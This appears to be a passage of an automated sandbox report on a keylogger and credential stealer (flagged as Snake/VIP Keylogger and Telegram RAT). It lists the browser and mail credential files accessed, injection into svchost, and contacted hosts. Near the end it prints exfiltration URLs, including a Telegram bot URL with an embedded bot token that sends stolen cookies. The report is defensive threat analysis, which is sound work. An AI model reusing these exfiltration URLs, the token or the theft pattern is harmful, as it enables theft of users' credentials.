Source: Yara match File source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: svchost.exe PID: 5260, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 6024, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
OS version to string mapping found (often used in BOTs)
Source: chordates.exe Binary or memory string: WIN_81
Source: chordates.exe Binary or memory string: WIN_XP
Source: chordates.exe.0.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: chordates.exe Binary or memory string: WIN_XPe
Source: chordates.exe Binary or memory string: WIN_VISTA
Source: chordates.exe Binary or memory string: WIN_7
Source: chordates.exe Binary or memory string: WIN_8
Yara detected Credential Stealer
Source: Yara match File source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: svchost.exe PID: 5260, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 6024, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: svchost.exe PID: 5260, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 6024, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: svchost.exe PID: 5260, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 6024, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C71204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_00C71204
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C71806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00C71806
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00EE1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 2_2_00EE1204
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00EE1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 2_2_00EE1806
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1481105 Sample: DSD876543456780000.exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 api.telegram.org 2->32 34 3 other IPs or domains 2->34 42 Multi AV Scanner detection for domain / URL 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 52 11 other signatures 2->52 8 DSD876543456780000.exe 6 2->8         started        12 wscript.exe 1 2->12         started        signatures3 48 Tries to detect the country of the analysis system (by using the IP) 30->48 50 Uses the Telegram API (likely for C&C communication) 32->50 process4 file5 26 C:\Users\user\AppData\Local\...\chordates.exe, PE32 8->26 dropped 60 Binary is likely a compiled AutoIt script file 8->60 62 Found API chain indicative of sandbox detection 8->62 14 chordates.exe 3 8->14         started        64 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->64 18 chordates.exe 2 12->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\...\chordates.vbs, data 14->28 dropped 66 Multi AV Scanner detection for dropped file 14->66 68 Binary is likely a compiled AutoIt script file 14->68 70 Machine Learning detection for dropped file 14->70 76 3 other signatures 14->76 20 svchost.exe 15 2 14->20         started        72 Writes to foreign memory regions 18->72 74 Maps a DLL or memory area into another process 18->74 24 svchost.exe 2 18->24         started        signatures9 process10 dnsIp11 36 api.telegram.org 149.154.167.220, 443, 49721, 49735 TELEGRAMRU United Kingdom 20->36 38 checkip.dyndns.com 158.101.44.242, 49704, 49707, 49709 ORACLE-BMC-31898US United States 20->38 40 2 other IPs or domains 20->40 54 System process connects to network (likely due to code injection or exploit) 24->54 56 Tries to steal Mail credentials (via file / registry access) 24->56 58 Tries to harvest and steal browser information (history, passwords, etc) 24->58 signatures12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
188.114.97.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true
118.69.190.131
 mail.vvtrade.vn Viet Nam
18403 FPT-AS-APTheCorporationforFinancingPromotingTechnolo true
158.101.44.242
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US true

Contacted Domains

Name IP Active
reallyfreegeoip.org 188.114.97.3 true
api.telegram.org 149.154.167.220 true
mail.vvtrade.vn 118.69.190.131 true
checkip.dyndns.com 158.101.44.242 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443825857&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery true
  • Avira URL Cloud: safe
 unknown
https://reallyfreegeoip.org/xml/8.46.123.33 true
  • URL Reputation: safe
 unknown
http://checkip.dyndns.org/ true
  • URL Reputation: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2027/07/2024%20/%2004:25:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D true
  • Avira URL Cloud: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2025/07/2024%20/%2010:29:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D true
  • Avira URL Cloud: safe
 unknown